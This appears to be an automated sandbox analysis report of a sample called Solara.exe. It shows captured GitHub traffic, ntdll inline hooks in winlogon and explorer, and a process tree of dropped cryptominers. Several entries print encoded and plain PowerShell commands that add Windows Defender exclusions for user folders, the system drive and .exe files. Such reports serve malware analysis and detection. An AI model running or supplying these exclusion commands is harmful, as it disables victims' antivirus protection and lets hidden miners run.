                        2025-01-07 15:05:20 UTC1370INData Raw: 0a 0a 0a 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 0a 20 20 6c 61 6e 67 3d 22 65 6e 22 0a 20 20 0a 20 20 64 61 74 61 2d 63 6f 6c 6f 72 2d 6d 6f 64 65 3d 22 61 75 74 6f 22 20 64 61 74 61 2d 6c 69 67 68 74 2d 74 68 65 6d 65 3d 22 6c 69 67 68 74 22 20 64 61 74 61 2d 64 61 72 6b 2d 74 68 65 6d 65 3d 22 64 61 72 6b 22 0a 20 20 64 61 74 61 2d 61 31 31 79 2d 61 6e 69 6d 61 74 65 64 2d 69 6d 61 67 65 73 3d 22 73 79 73 74 65 6d 22 20 64 61 74 61 2d 61 31 31 79 2d 6c 69 6e 6b 2d 75 6e 64 65 72 6c 69 6e 65 73 3d 22 74 72 75 65 22 0a 20 20 0a 20 20 3e 0a 0a 0a 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65
                        Data Ascii: <!DOCTYPE html><html lang="en" data-color-mode="auto" data-light-theme="light" data-dark-theme="dark" data-a11y-animated-images="system" data-a11y-link-underlines="true" > <head> <meta charset="utf-8"> <link rel="dns-prefe
                        2025-01-07 15:05:20 UTC1370INData Raw: 39 61 37 37 2e 63 73 73 22 20 2f 3e 3c 6c 69 6e 6b 20 64 61 74 61 2d 63 6f 6c 6f 72 2d 74 68 65 6d 65 3d 22 64 61 72 6b 5f 68 69 67 68 5f 63 6f 6e 74 72 61 73 74 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 64 61 74 61 2d 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 64 61 72 6b 5f 68 69 67 68 5f 63 6f 6e 74 72 61 73 74 2d 63 66 66 31 63 39 62 32 37 62 31 61 2e 63 73 73 22 20 2f 3e 3c 6c 69 6e 6b 20 64 61 74 61 2d 63 6f 6c 6f 72 2d 74 68 65 6d 65 3d 22 64 61 72 6b 5f 63 6f 6c 6f 72 62 6c 69 6e 64 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f
                        Data Ascii: 9a77.css" /><link data-color-theme="dark_high_contrast" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_high_contrast-cff1c9b27b1a.css" /><link data-color-theme="dark_colorblind" crossorigin="ano
                        2025-01-07 15:05:20 UTC1370INData Raw: 6d 65 72 2d 34 34 33 30 64 33 63 32 63 31 35 30 2e 63 73 73 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 67 6c 6f 62 61 6c 2d 31 64 33 34 34 30 65 39 34 36 64 64 2e 63 73 73 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65
                        Data Ascii: mer-4430d3c2c150.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/global-1d3440e946dd.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubasse
                        2025-01-07 15:05:20 UTC1370INData Raw: 66 66 37 31 30 34 35 63 66 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 6f 64 64 62 69 72 64 5f 70 6f 70 6f 76 65 72 2d 70 6f 6c 79 66 69 6c 6c 5f 64 69 73 74 5f 70 6f 70 6f 76 65 72 5f 6a 73 2d 39 64 61 36 35 32 66 35 38 34 37 39 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61
                        Data Ascii: ff71045cf.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_oddbird_popover-polyfill_dist_popover_js-9da652f58479.js"></script><script crossorigin="a
                        2025-01-07 15:05:20 UTC1370INData Raw: 6c 65 73 5f 67 69 74 68 75 62 5f 72 65 6c 61 74 69 76 65 2d 74 69 6d 65 2d 65 6c 65 6d 65 6e 74 5f 64 69 73 74 5f 69 6e 64 65 78 5f 6a 73 2d 66 36 64 61 34 62 33 66 61 33 34 63 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 61 75 74 6f 2d 63 6f 6d 70 6c 65 74 65 2d 65 6c 65 6d 65 6e 74 5f 64 69 73 74 5f 69 6e 64 65 78 5f
                        Data Ascii: les_github_relative-time-element_dist_index_js-f6da4b3fa34c.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_auto-complete-element_dist_index_
                        2025-01-07 15:05:20 UTC1370INData Raw: 65 6c 65 6d 65 6e 74 73 2d 66 39 39 31 63 66 61 62 35 31 30 35 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 65 6c 65 6d 65 6e 74 2d 72 65 67 69 73 74 72 79 2d 33 62 35 33 36 32 64 33 64 34 30 32 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70
                        Data Ascii: elements-f991cfab5105.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/element-registry-3b5362d3d402.js"></script><script crossorigin="anonymous" defer="defer" type="app
                        2025-01-07 15:05:20 UTC1370INData Raw: 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 63 6f 6c 6f 72 2d 63 6f 6e 76 65 72 74 5f 69 6e 64 65 78 5f 6a 73 2d 65 33 31 38 30 66 65 33 62 63 62 33 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62
                        Data Ascii: defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_color-convert_index_js-e3180fe3bcb3.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github
                        2025-01-07 15:05:20 UTC1370INData Raw: 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 61 70 70 5f 61 73 73 65 74 73 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 62 65 68 61 76 69 6f 72 73 5f 63 6f 6d 6d 65 6e 74 69 6e 67 5f 65 64 69 74 5f 74 73 2d 61 70 70 5f 61 73 73 65 74 73 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 62 65 68 61 76 69 6f 72 73 5f 68 74 2d 38 33 63 32 33 35 2d 66 62 34 33 38 31 36 61 62 38 33 63 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22
                        Data Ascii: script" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_commenting_edit_ts-app_assets_modules_github_behaviors_ht-83c235-fb43816ab83c.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript"
                        2025-01-07 15:05:20 UTC1370INData Raw: 33 31 22 20 64 61 74 61 2d 74 75 72 62 6f 2d 74 72 61 6e 73 69 65 6e 74 3d 22 74 72 75 65 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 73 69 74 6f 72 2d 70 61 79 6c 6f 61 64 22 20 63 6f 6e 74 65 6e 74 3d 22 65 79 4a 79 5a 57 5a 6c 63 6e 4a 6c 63 69 49 36 62 6e 56 73 62 43 77 69 63 6d 56 78 64 57 56 7a 64 46 39 70 5a 43 49 36 49 6a 46 43 4d 44 49 36 4d 30 51 32 4d 45 59 31 4f 6a 4d 35 52 44 63 77 4e 6a 51 36 4d 30 49 7a 52 55 4e 42 51 6a 6f 32 4e 7a 64 45 4e 44 4a 42 52 43 49 73 49 6e 5a 70 63 32 6c 30 62 33 4a 66 61 57 51 69 4f 69 49 31 4d 54 59 32 4e 54 59 34 4d 6a 67 78 4d 6a 51 32 4d 7a 55 79 4d 44 51 32 49 69 77 69 63 6d 56 6e 61 57 39 75 58 32 56 6b 5a 32 55 69 4f 69 4a 6d 63 6d 45 69 4c 43 4a 79 5a 57 64 70 62 32 35 66 63 6d 56 75 5a 47 56
                        Data Ascii: 31" data-turbo-transient="true" /><meta name="visitor-payload" content="eyJyZWZlcnJlciI6bnVsbCwicmVxdWVzdF9pZCI6IjFCMDI6M0Q2MEY1OjM5RDcwNjQ6M0IzRUNBQjo2NzdENDJBRCIsInZpc2l0b3JfaWQiOiI1MTY2NTY4MjgxMjQ2MzUyMDQ2IiwicmVnaW9uX2VkZ2UiOiJmcmEiLCJyZWdpb25fcmVuZGV


                        Code Manipulations

                        User Modules

                        Hook Summary

                        Function NameHook TypeActive in Processes
                        ZwEnumerateKeyINLINEwinlogon.exe, explorer.exe
                        NtQuerySystemInformationINLINEwinlogon.exe, explorer.exe
                        ZwResumeThreadINLINEwinlogon.exe, explorer.exe
                        NtDeviceIoControlFileINLINEwinlogon.exe, explorer.exe
                        ZwDeviceIoControlFileINLINEwinlogon.exe, explorer.exe
                        NtEnumerateKeyINLINEwinlogon.exe, explorer.exe
                        NtQueryDirectoryFileINLINEwinlogon.exe, explorer.exe
                        ZwEnumerateValueKeyINLINEwinlogon.exe, explorer.exe
                        ZwQuerySystemInformationINLINEwinlogon.exe, explorer.exe
                        NtResumeThreadINLINEwinlogon.exe, explorer.exe
                        RtlGetNativeSystemInformationINLINEwinlogon.exe, explorer.exe
                        NtQueryDirectoryFileExINLINEwinlogon.exe, explorer.exe
                        NtEnumerateValueKeyINLINEwinlogon.exe, explorer.exe
                        ZwQueryDirectoryFileExINLINEwinlogon.exe, explorer.exe
                        ZwQueryDirectoryFileINLINEwinlogon.exe, explorer.exe

                        Processes

                        Process: winlogon.exe, Module: ntdll.dll
                        Function NameHook TypeNew Data
                        ZwEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                        NtQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                        ZwResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                        NtDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                        ZwDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                        NtEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                        NtQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                        ZwEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                        ZwQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                        NtResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                        RtlGetNativeSystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                        NtQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                        NtEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                        ZwQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                        ZwQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                        Process: explorer.exe, Module: ntdll.dll
                        Function NameHook TypeNew Data
                        ZwEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                        NtQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                        ZwResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                        NtDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                        ZwDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                        NtEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                        NtQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                        ZwEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                        ZwQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                        NtResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                        RtlGetNativeSystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                        NtQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                        NtEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                        ZwQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                        ZwQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF

                        Statistics

                        CPU Usage

                        Click to jump to process

                        Memory Usage

                        Click to jump to process

                        High Level Behavior Distribution

                        Click to dive into process behavior distribution

                        Behavior

                        Click to jump to process

                        System Behavior

                        General

                        Target ID:0
                        Start time:10:05:08
                        Start date:07/01/2025
                        Path:C:\Users\user\Desktop\Solara.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\Solara.exe"
                        Imagebase:0x400000
                        File size:22'179'840 bytes
                        MD5 hash:A6BF6970741F337BCB700166165C1F30
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:low
                        Has exited:true

                        General

                        Target ID:1
                        Start time:10:05:08
                        Start date:07/01/2025
                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHAAeABuACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAeQBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGcAYQBlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHcAZQBwACMAPgA="
                        Imagebase:0x5e0000
                        File size:433'152 bytes
                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:2
                        Start time:10:05:08
                        Start date:07/01/2025
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff6d64d0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:4
                        Start time:10:05:09
                        Start date:07/01/2025
                        Path:C:\Users\user\AppData\Local\Temp\eth.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Users\user\AppData\Local\Temp\eth.exe"
                        Imagebase:0x7ff6e2780000
                        File size:5'468'672 bytes
                        MD5 hash:87C3DD67BFA3009D89F7B45B01D705B8
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Antivirus matches:
                        • Detection: 68%, ReversingLabs
                        Reputation:low
                        Has exited:true

                        General

                        Target ID:5
                        Start time:10:05:09
                        Start date:07/01/2025
                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                        Imagebase:0x7ff7be880000
                        File size:452'608 bytes
                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:6
                        Start time:10:05:09
                        Start date:07/01/2025
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff6d64d0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:7
                        Start time:10:05:09
                        Start date:07/01/2025
                        Path:C:\Users\user\AppData\Local\Temp\xmr.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Users\user\AppData\Local\Temp\xmr.exe"
                        Imagebase:0x7ff68e980000
                        File size:5'468'672 bytes
                        MD5 hash:154202154E41175E801A698CA940EB0C
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Antivirus matches:
                        • Detection: 76%, ReversingLabs
                        Reputation:low
                        Has exited:true

                        General

                        Target ID:8
                        Start time:10:05:09
                        Start date:07/01/2025
                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                        Imagebase:0x7ff7be880000
                        File size:452'608 bytes
                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:9
                        Start time:10:05:09
                        Start date:07/01/2025
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff6d64d0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:10
                        Start time:10:05:10
                        Start date:07/01/2025
                        Path:C:\Users\user\AppData\Local\Temp\Solara Bootstrapper.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\AppData\Local\Temp\Solara Bootstrapper.exe"
                        Imagebase:0x400000
                        File size:10'967'040 bytes
                        MD5 hash:00A1864355A5EA47902E5757C0D87FD9
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Antivirus matches:
                        • Detection: 100%, Avira
                        • Detection: 100%, Joe Sandbox ML
                        • Detection: 68%, ReversingLabs
                        Reputation:low
                        Has exited:true

                        General

                        Target ID:11
                        Start time:10:05:11
                        Start date:07/01/2025
                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAdQBiACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAcQB3ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAbQB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGIAZgBpACMAPgA="
                        Imagebase:0x5e0000
                        File size:433'152 bytes
                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:12
                        Start time:10:05:12
                        Start date:07/01/2025
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff6d64d0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:13
                        Start time:10:05:12
                        Start date:07/01/2025
                        Path:C:\Users\user\AppData\Local\Temp\kx new.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\AppData\Local\Temp\kx new.exe"
                        Imagebase:0x400000
                        File size:10'948'608 bytes
                        MD5 hash:D9D13FA25E880665FB471A4BE57C494C
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Antivirus matches:
                        • Detection: 100%, Avira
                        • Detection: 100%, Joe Sandbox ML
                        • Detection: 71%, ReversingLabs
                        Reputation:low
                        Has exited:true

                        General

                        Target ID:15
                        Start time:10:05:15
                        Start date:07/01/2025
                        Path:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe"
                        Imagebase:0x620000
                        File size:13'312 bytes
                        MD5 hash:6557BD5240397F026E675AFB78544A26
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Antivirus matches:
                        • Detection: 33%, ReversingLabs
                        Has exited:true

                        General

                        Target ID:16
                        Start time:10:05:15
                        Start date:07/01/2025
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff6d64d0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:17
                        Start time:10:05:15
                        Start date:07/01/2025
                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAcAB0ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAcAB0ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG4AagBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAbgBxACMAPgA="
                        Imagebase:0x5e0000
                        File size:433'152 bytes
                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:18
                        Start time:10:05:15
                        Start date:07/01/2025
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff6d64d0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:19
                        Start time:10:05:17
                        Start date:07/01/2025
                        Path:C:\Users\user\AppData\Local\Temp\Kawpow new.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Users\user\AppData\Local\Temp\Kawpow new.exe"
                        Imagebase:0x7ff762150000
                        File size:5'471'744 bytes
                        MD5 hash:FB6A3B436E9F9402937D95F755B62F91
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Antivirus matches:
                        • Detection: 74%, ReversingLabs
                        Has exited:true

                        General

                        Target ID:20
                        Start time:10:05:17
                        Start date:07/01/2025
                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                        Imagebase:0x7ff7be880000
                        File size:452'608 bytes
                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:21
                        Start time:10:05:17
                        Start date:07/01/2025
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff6d64d0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:22
                        Start time:10:05:17
                        Start date:07/01/2025
                        Path:C:\Users\user\AppData\Local\Temp\xmr new.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Users\user\AppData\Local\Temp\xmr new.exe"
                        Imagebase:0x7ff652d50000
                        File size:5'471'744 bytes
                        MD5 hash:7D6398EBFB82A24748617189BF4AD691
                        Has elevated privileges:true
